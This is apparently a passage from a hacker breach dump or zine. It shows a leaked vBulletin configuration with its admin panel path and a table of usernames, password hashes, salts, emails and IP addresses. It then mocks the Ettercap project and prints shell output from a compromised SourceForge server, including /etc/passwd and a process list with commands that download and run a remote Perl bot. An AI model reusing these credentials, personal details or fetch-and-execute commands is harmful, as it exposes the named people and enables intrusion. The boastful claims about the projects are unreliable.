1989config['Misc']['admincpdir'] = 'r00tpan3l123lol';
1990config['Misc']['modcpdir'] = 'modcp';
1991
1992 // Prefix that all vBulletin cookies will have
1993 // Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
1994config['Misc']['cookieprefix'] = 'bb';
1995
1996 // ******** FULL PATH TO FORUMS DIRECTORY ******
1997 // On a few systems it may be necessary to input the full path to your forums directory
1998 // for vBulletin to function normally. You can ignore this setting unless vBulletin
1999 // tells you to fill this in. Do not include a trailing slash!
2000 // Example Unix:
2001 // config['Misc']['forumpath'] = '/home/users/public_html/forums';
2002 // Example Win32:
2003 // config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
2004config['Misc']['forumpath'] = '';
2005
2006 // ****** COOKIE SECURITY HASH ******
2007 // This option allows you to encode cookie.
2008 // You may use any latin and/or any other alphanumeric symbols.
2009 // Leave this blank to use the default value.
2010 // Note: if you change this all users will be logout.
2011config['Misc']['cookie_security_hash'] = '';
2012
2013
2014
2015 // ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
2016 // The users specified here will be allowed to view the admin log in the control panel.
2017 // Users must be specified by *ID number* here. To obtain a user's ID number,
2018 // view their profile via the control panel. If this is a new installation, leave
2019 // the first user created will have a user ID of 1. Seperate each userid with a comma.
2020config['SpecialUsers']['canviewadminlog'] = '1,237';
2021
2022 // ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
2023 // The users specified here will be allowed to remove ("prune") entries from the admin
2024 // log. See the above entry for more information on the format.
2025config['SpecialUsers']['canpruneadminlog'] = '1';
2026
2027 // ****** USERS WITH QUERY RUNNING PERMISSIONS ******
2028 // The users specified here will be allowed to run queries from the control panel.
2029 // See the above entries for more information on the format.
2030 // Please note that the ability to run queries is quite powerful. You may wish
2031 // to remove all user IDs from this list for security reasons.
2032config['SpecialUsers']['canrunqueries'] = '';
2033
2034 // ****** UNDELETABLE / UNALTERABLE USERS ******
2035 // The users specified here will not be deletable or alterable from the control panel by any users.
2036 // To specify more than one user, separate userids with commas.
2037config['SpecialUsers']['undeletableusers'] = '1';
2038
2039 // ****** SUPER ADMINISTRATORS ******
2040 // The users specified below will have permission to access the administrator permissions
2041 // page, which controls the permissions of other administrators
2042config['SpecialUsers']['superadministrators'] = '1';
2043
2044 // ****** DATASTORE CACHE CONFIGURATION *****
2045 // Here you can configure different methods for caching datastore items.
2046 // vB_Datastore_Filecache - to use includes/datastore/datastore_cache.php
2047 // vB_Datastore_APC - to use APC
2048 // vB_Datastore_XCache - to use XCache
2049 // vB_Datastore_Memcached - to use a Memcache server, more configuration below
2050// config['Datastore']['class'] = 'vB_Datastore_Filecache';
2051
2052 // ******** DATASTORE PREFIX ******
2053 // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
2054 // than one set of forums installed on your host, you *may* need to use a prefix
2055 // so that they do not try to use the same variable within the cache.
2056 // This works in a similar manner to the database table prefix.
2057// config['Datastore']['prefix'] = '';
2058
2059 // It is also necessary to specify the hostname or IP address and the port the server is listening on
2060/*
2061config['Datastore']['class'] = 'vB_Datastore_Memcached';
2062i = 0;
2063// First Server
2064i++;
2065config['Misc']['memcacheserver'][i] = '127.0.0.1';
2066config['Misc']['memcacheport'][i] = 11211;
2067config['Misc']['memcachepersistent'][i] = true;
2068config['Misc']['memcacheweight'][i] = 1;
2069config['Misc']['memcachetimeout'][i] = 1;
2070config['Misc']['memcacheretry_interval'][i] = 15;
2071*/
2072
2073// ****** The following options are only needed in special cases ******
2074
2075 // ****** MySQLI OPTIONS *****
2076 // When using MySQL 4.1+, MySQLi should be used to connect to the database.
2077 // If you need to set the default connection charset because your database
2078 // is using a charset other than latin1, you can set the charset here.
2079 // If you don't set the charset to be the same as your database, you
2080 // may receive collation errors. Ignore this setting unless you
2081 // are sure you need to use it.
2082// config['Mysqli']['charset'] = 'utf8';
2083
2084 // Optionally, PHP can be instructed to set connection parameters by reading from the
2085 // file named in 'ini_file'. Please use a full path to the file.
2086 // Example:
2087 // config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
2088config['Mysqli']['ini_file'] = '';
2089
2090// Image Processing Options
2091 // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
2092config['Misc']['maxwidth'] = 2592;
2093config['Misc']['maxheight'] = 1944;
2094
2095/*======================================================================*\
2096|| ####################################################################
2097|| # CVS: RCSfile - Revision: 28757
2098|| ####################################################################
2099\*======================================================================*/
2100
2101
2102 /; ;\
2103 __ \\____//
2104 /{_\_/ `'\____
2105 \___ (o) (o } I AM AN INJ3CT0R
2106 _____________________________/ :--' / CHICK, MOO
2107 ,-,'`@@@@@@@@ @@@@@@ \_ `__\
2108 ;:( @@@@@@@@@ @@@ \___(o'o)
2109 :: ) @@@@ @@@@@@ ,'@@( `===='
2110 :: : @@@@@: @@@@ `@@@:
2111 :: \ @@@@@: @@@@@@@) ( '@@@'
2112 ;; /\ /`, @@@@@@@@@\ :@@@@@)
2113 ::/ ) {_----------------: :~`,~~;
2114 ;;'`; : ) : / `; ;
2115;;;; : : ; : ; ; :
2116`'`' / : : : : : :
2117 )_ \__; ";" :_ ; \_\ `,','
2118 :__\ \ * `,'* \ \ : \ * 8`;'* *
2119 `^' \ :/ `^' `-^-' \v/ : \/ BA
2120
2121
2122
2123Sid3^effects:661567a4c0a71a50fdcf4b2c550775d4:}uP>ob0J%H?EB_&*9z(q7:v%w)j,yx:shell_c99@yahoo.com:122.164.235.10:
2124L0rd CrusAd3r:2685fd80293b5b6cf1a2d2f488b2db72:{pmYzcy%QfgFy0ftJ?_>"F|L42vtcK:lord.v5111@gmail.com:59.92.22.151:
2125Inj3ct0r:170aebb9d6ba17f411e90b931421f703:.Q:eI}"c";[e`?'o6N/al|}RE;-mNU:admin@admin.com::
2126eidelweiss:cd0c84191f189462696ec6de04a5455b:KNU@c;qRh;j$Qc9Vp+r=:$<Pi/rr]T:g1xsystem@windowslive.com:125.167.199.36:
2127Sn!pEr.S!Te:c5e3f6e791415b187d3d4e2b3d925f77:H?OV^L*.MS@Q03f9uQ_g]D|@vTE0_v:sniper-site@hotmail.com:188.52.23.241:1111117
2128SONiC:4470e1dc2c49e82f9fca1a3dfc390b1a:4gJ4eT\Rj|L}O/%6(@,&05#:ofzi}#:sonicdefence@gmail.com:115.242.246.84:
2129Napst3r:d73666e5df3d0eb8a714d5a82178e5d7:#}bjIPUanj,[v2yiQVg~oZhv&<g;`k:n4pst3rr@ymail.com:94.183.216.10:3124741
2130Th3 RDX:b76091a46d7539eacf00cb149f12f963:0;a?QrF0KSHPX"t_q\?.[N&(@mK|K[:th3rdx@gmail.com:78.107.237.16:
2131agix:81c472aa99efd24319045f02d5f16be6:e_AcAV4sgTlR6rPEk)-&aexwXLqGpo:flogaultier@hotmail.com:82.228.79.212:laconte
2132gunslinger_:1b804cc6bf8cbd19c7276d694cf538a6:N_}fYU<sB676{aGTg([1*`p<$yztnG:yudha.gunslinger@gmail.com:182.0.91.89:
2133indoushka:3d277315b290351a56ec18e4aee1a988:VZIKmamSDtKwy&KnJU)uT`viut}c,$:indoushka@hotmail.com:41.107.107.238:123456789
2134SeeMe:f3dfe545ae017c7fcb8c7df9884255f1:s~.$o798QL'>}mFtE1ZHRD(LW/Uvhj:jimsalimg@msn.com:41.252.59.225:
2135KnocKout:64f26f1e22bba61290603bc8f514a56d:`gXoY<&>G~m02Z)EMJK{*oRa\>8aAr:mmertocan@gmail.com:88.242.249.163:
2136anT!-Tr0J4n:b6f1b2d02236cb9bc983482c5789999c:`dFJd>n&KjhTtynf#L05jSQ%h'=jsl:rnoom_h@yahoo.com:41.191.28.15:
2137
2138,_._._._._._._._|____________________________________________________
2139|_|_|_|_|_|_|_|_|___________________________________________________/
2140 ~ ettercap ~ !
2141
2142You would think that the authors of Ettercap, one of the most popular
2143whitehat pentesting tools, would know the basics of security.
2144Apparently they don't, or they just don't give a shit about what
2145happens to their users.
2146
2147So, why is their website so insecure? Ettercap's message board is
2148hosted at Sourceforge, so they share a server with thousands of other
2149customers. Every single customer is able to execute commands and
2150access the other project directories. Pretty stupid, eh? You only need
2151to find one hole in one hosted site and you can access ALL the project
2152databases. Of course that isn't ALoR's fault, it's Sourceforge's
2153fault. Regardless, people who care about security and data integrity
2154wouldn't use such a shitty provider, would they? To be fair, the
2155Ettercap project is dead. Most of the admins have been inactive for a
2156few years now, but that is no excuse for such a security mess.
2157Especially since the server was compromised some five years ago.
2158
2159Just look at the process list, horrible. Even the worst perl bots
2160(scax) get access. If such a poorly written bot can own this box,
2161everyone can.
2162
2163Some good advice to all other people/projects who are using
2164Sourceforge: Move. There are enough good alternatives. Yes, I am
2165talking to you Vim, get the fuck out of there. And to all Ettercap
2166users: arp poisoning is *not* hacking. If you want to achieve
2167something real, learn the fundamentals and not how to use a GUI. Don't
2168sniff the passwords of your friends and call yourself a pentester
2169(looking at you firesheep).
2170
2171 _ _
2172 | | | |
2173 ___| |_| |_ ___ _ __ ___ _ __ __ _ __
2174 / _ \ __| __/ _ \ '__/ __| '__|/ \ | '_ \
2175 | __/ |_| || __/ | | (__| | / /\ \ | |_) |
2176 \___|\__|\__\___|_| \___|_| /_/ \_\| .__/
2177 | |
2178 |_|
2179 Baa.
2180 I flood SID's
2181 I'm a Hacker!! Baa.
2182 Baa. Baa. I sit at starbucks
2183I sniff packets | I'm a Hacker!!
2184I'm a Hacker!! | Baa.
2185Baa.. | /
2186 \ __ _ | / YOUR ALL FUCKING
2187 \ .-.' `; `-._ __ _ __ _ SHEEP.
2188 \ (_, .-:' `; `-._.-.:' `; `-._
2189 ,'o"( "HACKE(_, (_, )
2190 (__,-' ,'o"( "HACKE,'o"( "HACKER" )> STOP BEING SHEEP!
2191 ( (__,-' (__,-' )
2192 `-'._.--._( ( ) FUCKING INNOVATE!
2193 ||| |||`-'._.--._.-' `-'._.--._.-'
2194 ||| ||| ||| |||
2195
2196$ uname -a
2197Linux sfp-web-9.v30.ch3.sourceforge.com 2.6.18-194.11.4.el5 #1 SMP Tue Sep 21 05:04:09 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
2198
2199$ id
2200uid=48(apache) gid=48(apache) groups=48(apache),302(amqp)
2201
2202$ cat /etc/passwd
2203root:x:0:0:root:/root:/bin/bash
2204bin:x:1:1:bin:/bin:/sbin/nologin
2205daemon:x:2:2:daemon:/sbin:/sbin/nologin
2206adm:x:3:4:adm:/var/adm:/sbin/nologin
2207lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
2208sync:x:5:0:sync:/sbin:/bin/sync
2209shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
2210halt:x:7:0:halt:/sbin:/sbin/halt
2211mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
2212news:x:9:13:news:/etc/news:
2213uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
2214operator:x:11:0:operator:/root:/sbin/nologin
2215games:x:12:100:games:/usr/games:/sbin/nologin
2216gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
2217ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
2218nobody:x:99:99:Nobody:/:/sbin/nologin
2219dbus:x:81:81:System message bus:/:/sbin/nologin
2220nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
2221vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
2222exim:x:93:93::/var/spool/exim:/sbin/nologin
2223rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
2224rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
2225nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
2226sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
2227pcap:x:77:77::/var/arpwatch:/sbin/nologin
2228avahi:x:70:70:Avahi daemon:/:/sbin/nologin
2229ntp:x:38:38::/etc/ntp:/sbin/nologin
2230rpm:x:37:37::/var/lib/rpm:/sbin/nologin
2231haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
2232xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
2233named:x:25:25:Named:/var/named:/sbin/nologin
2234sashroot:x:0:500:sashroot:/sashroot:/bin/bash
2235osiris:x:300:300:Osiris Daemon:/var/lib/osiris:/sbin/nologin
2236puppet:x:301:301:Puppet:/var/lib/puppet:/sbin/nologin
2237apache:x:48:48:Apache:/var/www:/sbin/nologin
2238vhost:*:310:310:Vhost User:/home/vhost:/bin/bash
2239rtstats:*:442:442:RTstats user:/var/local/stats:/bin/bash
2240nginx:x:443:443:Nginx user:/var/lib/nginx:/bin/false
2241nrpe:x:444:446:NRPE user for the NRPE service:/:/sbin/nologin
2242dummy:*:103:103:projectweb dummy user:/home/dummy:/bin/false
2243www:*:448:448:WWW User:/var/www:/bin/bash
2244sfeng:*:333:333:SF Engineer:/home/sfeng:/bin/rbash
2245sfeng2:*:332:332:SF Engineer 2:/home/sfeng2:/bin/bash
2246avahi-autoipd:x:449:449:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
2247oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
2248munin:x:450:450:Munin user:/var/lib/munin:/sbin/nologin
2249rrdcached:x:451:451:rrdcached:/var/rrdtool/rrdcached:/sbin/nologin
2250
2251$ ps auxwww
2252USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
2253root 1 0.0 0.0 10352 80 ? Ss Sep28 0:46 init [3]
2254root 2 0.0 0.0 0 0 ? S< Sep28 1:58 [migration/0]
2255root 3 0.0 0.0 0 0 ? SN Sep28 0:01 [ksoftirqd/0]
2256root 4 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/0]
2257root 5 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/1]
2258root 6 0.0 0.0 0 0 ? SN Sep28 0:48 [ksoftirqd/1]
2259root 7 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/1]
2260root 8 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/2]
2261root 9 0.0 0.0 0 0 ? SN Sep28 0:09 [ksoftirqd/2]
2262root 10 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/2]
2263root 11 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/3]
2264root 12 0.0 0.0 0 0 ? SN Sep28 1:42 [ksoftirqd/3]
2265root 13 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/3]
2266root 14 0.0 0.0 0 0 ? S< Sep28 0:14 [migration/4]
2267root 15 0.0 0.0 0 0 ? SN Sep28 0:02 [ksoftirqd/4]
2268root 16 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/4]
2269root 17 0.0 0.0 0 0 ? S< Sep28 0:20 [migration/5]
2270root 18 0.0 0.0 0 0 ? SN Sep28 0:04 [ksoftirqd/5]
2271root 19 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/5]
2272root 20 0.0 0.0 0 0 ? S< Sep28 0:09 [migration/6]
2273root 21 0.0 0.0 0 0 ? SN Sep28 0:03 [ksoftirqd/6]
2274root 22 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/6]
2275root 23 0.0 0.0 0 0 ? S< Sep28 0:08 [migration/7]
2276root 24 0.0 0.0 0 0 ? SN Sep28 0:03 [ksoftirqd/7]
2277root 25 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/7]
2278root 26 0.0 0.0 0 0 ? S< Sep28 0:00 [events/0]
2279root 27 0.0 0.0 0 0 ? S< Sep28 0:00 [events/1]
2280root 28 0.0 0.0 0 0 ? S< Sep28 0:00 [events/2]
2281root 29 0.0 0.0 0 0 ? S< Sep28 0:00 [events/3]
2282root 30 0.0 0.0 0 0 ? S< Sep28 0:00 [events/4]
2283root 31 0.0 0.0 0 0 ? S< Sep28 0:00 [events/5]
2284root 32 0.0 0.0 0 0 ? S< Sep28 0:00 [events/6]
2285root 33 0.0 0.0 0 0 ? S< Sep28 0:00 [events/7]
2286root 34 0.0 0.0 0 0 ? S< Sep28 0:00 [khelper]
2287root 105 0.0 0.0 0 0 ? S< Sep28 0:00 [kthread]
2288root 116 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/0]
2289root 117 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/1]
2290root 118 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/2]
2291root 119 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/3]
2292root 120 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/4]
2293root 121 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/5]
2294root 122 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/6]
2295root 123 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/7]
2296root 124 0.0 0.0 0 0 ? S< Sep28 0:00 [kacpid]
2297root 237 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/0]
2298root 238 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/1]
2299root 239 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/2]
2300root 240 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/3]
2301root 241 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/4]
2302root 242 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/5]
2303root 243 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/6]
2304root 244 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/7]
2305root 247 0.0 0.0 0 0 ? S< Sep28 0:00 [khubd]
2306root 249 0.0 0.0 0 0 ? S< Sep28 0:00 [kseriod]
2307root 364 0.0 0.0 0 0 ? S Sep28 0:00 [khungtaskd]
2308root 367 0.0 0.0 0 0 ? S< Sep28 29:37 [kswapd0]
2309root 368 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/0]
2310root 369 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/1]
2311root 370 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/2]
2312root 371 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/3]
2313root 372 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/4]
2314root 373 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/5]
2315root 374 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/6]
2316root 375 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/7]
2317root 539 0.0 0.0 0 0 ? S< Sep28 0:00 [kpsmoused]
2318root 618 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_0]
2319root 637 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/0]
2320root 638 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/1]
2321root 639 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/2]
2322root 640 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/3]
2323root 641 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/4]
2324root 642 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/5]
2325root 643 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/6]
2326root 644 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/7]
2327root 645 0.0 0.0 0 0 ? S< Sep28 0:00 [ata_aux]
2328root 664 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_1]
2329root 665 0.0 0.0 0 0 ? S< Sep28 5:14 [usb-storage]
2330root 667 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_2]
2331root 668 0.0 0.0 0 0 ? S< Sep28 1:45 [usb-storage]
2332root 679 0.0 0.0 0 0 ? S< Sep28 0:00 [kstriped]
2333root 716 0.0 0.0 0 0 ? S< Sep28 0:00 [ksnapd]
2334root 755 0.0 0.0 0 0 ? S< Sep28 30:00 [kjournald]
2335root 780 0.0 0.0 0 0 ? S< Sep28 0:02 [kauditd]
2336root 813 0.0 0.0 12764 168 ? S<s Sep28 0:00 /sbin/udevd -d
2337root 1571 0.0 0.0 0 0 ? S< Sep28 0:00 [kedac]
2338root 2416 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/0]
2339root 2417 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/1]
2340root 2418 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/2]
2341root 2419 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/3]
2342root 2420 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/4]
2343root 2421 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/5]
2344root 2422 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/6]
2345root 2423 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpathd/7]
2346root 2424 0.0 0.0 0 0 ? S< Sep28 0:00 [kmpath_handlerd]
2347root 2448 0.0 0.0 0 0 ? S< Sep28 0:00 [kjournald]
2348root 2931 0.0 0.0 0 0 ? S< Sep28 0:00 [bond0]
2349root 3221 0.0 0.0 92864 476 ? S<sl Sep28 2:13 auditd
2350root 3223 0.0 0.0 81804 292 ? S<sl Sep28 2:33 /sbin/audispd
2351root 3253 0.0 0.0 5912 308 ? Ss Sep28 1:09 syslogd -m 0
2352root 3256 0.0 0.0 3808 196 ? Ss Sep28 0:15 klogd -x
2353root 3270 0.0 0.0 10764 280 ? Ss Sep28 1:06 irqbalance
2354named 3307 0.0 0.0 291644 3428 ? Ssl Sep28 79:54 /usr/sbin/named -u named
2355rpc 3341 0.0 0.0 8056 32 ? Ss Sep28 0:00 portmap
2356root 3378 0.0 0.0 0 0 ? S< Sep28 44:14 [rpciod/0]
2357root 3379 0.0 0.0 0 0 ? S< Sep28 0:19 [rpciod/1]
2358root 3380 0.0 0.0 0 0 ? S< Sep28 0:16 [rpciod/2]
2359root 3381 0.0 0.0 0 0 ? S< Sep28 0:19 [rpciod/3]
2360root 3382 0.0 0.0 0 0 ? S< Sep28 1:01 [rpciod/4]
2361root 3383 0.0 0.0 0 0 ? S< Sep28 0:17 [rpciod/5]
2362root 3384 0.0 0.0 0 0 ? S< Sep28 0:16 [rpciod/6]
2363root 3385 0.0 0.0 0 0 ? S< Sep28 0:18 [rpciod/7]
2364rpcuser 3398 0.0 0.0 10164 212 ? Ss Sep28 0:00 rpc.statd
2365root 3421 0.0 0.0 55448 4 ? Ss Sep28 0:00 rpc.idmapd
2366dbus 3444 0.0 0.0 21260 4 ? Ss Sep28 0:00 dbus-daemon --system
2367root 3498 0.0 0.0 0 0 ? S< Sep28 9:35 [nfsiod]
2368root 3499 0.0 0.0 0 0 ? S Sep28 0:00 [lockd]
2369root 3568 0.0 0.0 3804 4 ? Ss Sep28 0:00 /usr/sbin/acpid
2370nscd 3589 0.0 0.0 252376 828 ? Ssl Sep28 24:19 /usr/sbin/nscd
2371root 3630 0.0 0.0 67656 332 ? Ss Sep28 0:48 /usr/sbin/sshd
2372root 3647 0.0 0.0 22072 412 ? Ss Sep28 1:15 xinetd -stayalive -pidfile /var/run/xinetd.pid
2373ntp 3667 0.0 0.0 23820 5452 ? SLs Sep28 0:31 ntpd -u ntp:ntp -p /var/run/ntpd.pid
2374exim 3686 0.0 0.0 80572 580 ? Ss Sep28 0:35 /usr/sbin/exim -bd -q1h
2375root 3824 0.0 0.0 72920 488 ? Ss Sep28 0:36 crond
2376root 3839 0.0 0.0 95052 3052 ? Ss Sep28 0:36 /usr/sbin/munin-node
2377root 4211 0.0 0.0 69544 4 ? Ssl Oct13 0:00 sfcbd -d
2378root 4213 0.0 0.0 59300 4 ? S Oct13 0:00 sfcbd -d
2379root 4214 0.0 0.0 71740 4 ? S Oct13 0:00 sfcbd -d
2380root 4274 0.0 0.0 159036 3408 ? Sl Oct13 5:06 /usr/sbin/snmpd -LSnd -Lf /dev/null -p /var/run/snmpd.pid -a -c /etc/snmp/snmpd.sfinc-utils.conf
2381root 4303 0.0 0.0 61380 4 ? S Oct13 0:00 sfcbd -d
2382root 4417 0.0 0.0 0 0 ? S Nov24 0:12 [pdflush]
2383root 4565 0.0 0.0 279692 2792 ? Ssl Oct13 8:44 /opt/dell/srvadmin/sbin/dsm_sa_datamgrd
2384root 4568 0.0 0.0 61360 4 ? S Oct13 0:00 sfcbd -d
2385root 4571 0.0 0.0 73688 4 ? S Oct13 0:00 sfcbd -d
2386root 4864 0.0 0.0 174704 528 ? Ssl Oct13 0:36 /opt/dell/srvadmin/sbin/dsm_sa_eventmgrd
2387root 4925 0.0 0.0 254748 2084 ? Ssl Oct13 15:43 /opt/dell/srvadmin/sbin/dsm_sa_snmpd
2388avahi 5106 0.0 0.0 21612 532 ? Ss Sep28 0:00 avahi-daemon: running [sfp-web-9.local]
2389avahi 5107 0.0 0.0 21480 200 ? Ss Sep28 0:00 avahi-daemon: chroot helper
239068 5156 0.0 0.0 29540 1216 ? Ss Sep28 0:52 hald
2391root 5157 0.0 0.0 21700 448 ? S Sep28 0:00 hald-runner
239268 5188 0.0 0.0 10656 484 ? S Sep28 0:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket
239368 5200 0.0 0.0 10660 480 ? S Sep28 0:00 hald-addon-keyboard: listening on /dev/input/event0
2394root 5208 0.0 0.0 10232 432 ? S Sep28 4:39 hald-addon-storage: polling /dev/scd0
2395root 5213 0.0 0.0 10232 432 ? S Sep28 1:13 hald-addon-storage: polling /dev/hda
2396root 5215 0.0 0.0 10232 440 ? S Sep28 1:07 hald-addon-storage: polling /dev/sdb
2397root 5245 0.0 0.0 35904 240 ? S Sep28 0:00 /usr/sbin/osirisd -r /var/lib/osiris
2398osiris 5246 0.0 0.0 36116 748 ? S Sep28 0:00 /usr/sbin/osirisd -r /var/lib/osiris
2399root 5249 0.0 0.0 3796 436 tty1 Ss+ Sep28 0:00 /sbin/mingetty tty1
2400root 5250 0.0 0.0 3796 436 tty2 Ss+ Sep28 0:00 /sbin/mingetty tty2
2401root 5251 0.0 0.0 3796 436 tty3 Ss+ Sep28 0:00 /sbin/mingetty tty3
2402root 5252 0.0 0.0 3796 436 tty4 Ss+ Sep28 0:00 /sbin/mingetty tty4
2403root 5254 0.0 0.0 3796 436 tty5 Ss+ Sep28 0:00 /sbin/mingetty tty5
2404root 5256 0.0 0.0 3796 436 tty6 Ss+ Sep28 0:00 /sbin/mingetty tty6
2405apache 5767 0.0 0.0 8704 828 ? S Nov18 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
2406apache 5769 0.0 0.0 58608 1508 ? S Nov18 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
2407apache 8772 0.0 0.4 395468 38516 ? S Nov23 0:02 /usr/sbin/httpd
2408apache 9928 0.0 0.4 393956 39732 ? S Nov24 0:05 /usr/sbin/httpd
2409root 10444 0.0 0.0 316928 6416 ? Ss Nov16 0:27 /usr/sbin/httpd
2410root 10445 0.0 0.0 3852 504 ? S Nov16 1:57 /usr/sbin/cronolog --symlink=/var/local/log/error_log /var/local/log/%Y/%m/%d/error.log
2411root 10447 0.0 0.0 3848 440 ? S Nov16 1:23 /usr/sbin/cronolog --symlink=/var/local/log/vhost_log /var/local/log/%Y/%m/%d/vhost_log
2412root 10448 0.0 0.0 3848 460 ? S Nov16 5:50 /usr/sbin/cronolog --symlink=/var/local/log/access_log /var/local/log/%Y/%m/%d/access_log
2413root 10449 0.0 0.0 3856 440 ? S Nov16 0:03 /usr/sbin/cronolog --symlink=/var/local/log/developerweb_log /var/local/log/%Y/%m/%d/developerweb_log
2414root 10450 0.0 0.2 125312 18580 ? Sl Nov16 10:28 /usr/bin/perl -w /var/local/mastertree/host/sfp-web/scripts/vhost_rewriter
2415apache 10865 0.0 0.3 390016 25028 ? S Nov24 0:01 /usr/sbin/httpd
2416apache 11814 0.0 0.0 8704 1016 ? S Nov24 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
2417apache 11816 0.0 0.0 58608 2620 ? S Nov24 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
2418apache 12188 0.0 0.0 8704 980 ? S Nov24 0:00 sh -c cd /tmp;lftpget http://95.178.16.118/b;chmod x b;perl b;cd /tmp;rm -rf *;
2419apache 12189 0.0 0.0 58616 2624 ? S Nov24 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/b";
2420root 12523 0.0 0.0 56648 392 ? Ss Nov04 0:00 nginx: master process /usr/sbin/nginx -c /etc/nginx/nginx.conf
2421nginx 12524 0.2 0.0 57388 1500 ? S Nov04 68:37 nginx: worker process
2422nginx 12525 0.1 0.0 57764 1840 ? S Nov04 59:01 nginx: worker process
2423nginx 12526 0.2 0.0 57456 1520 ? S Nov04 64:31 nginx: worker process
2424nginx 12527 0.2 0.0 58160 2404 ? S Nov04 63:14 nginx: worker process
2425nginx 12528 0.1 0.0 57788 1780 ? S Nov04 47:43 nginx: worker process
2426nginx 12529 0.1 0.0 57720 1792 ? S Nov04 48:26 nginx: worker process
2427nginx 12530 0.2 0.0 57584 1620 ? S Nov04 61:50 nginx: worker process
2428nginx 12531 0.2 0.0 57856 1884 ? S Nov04 64:09 nginx: worker process
2429apache 13296 0.7 0.5 411004 46200 ? S 12:18 0:04 /usr/sbin/httpd
2430apache 13709 0.0 0.5 403000 42372 ? S Nov24 0:06 /usr/sbin/httpd
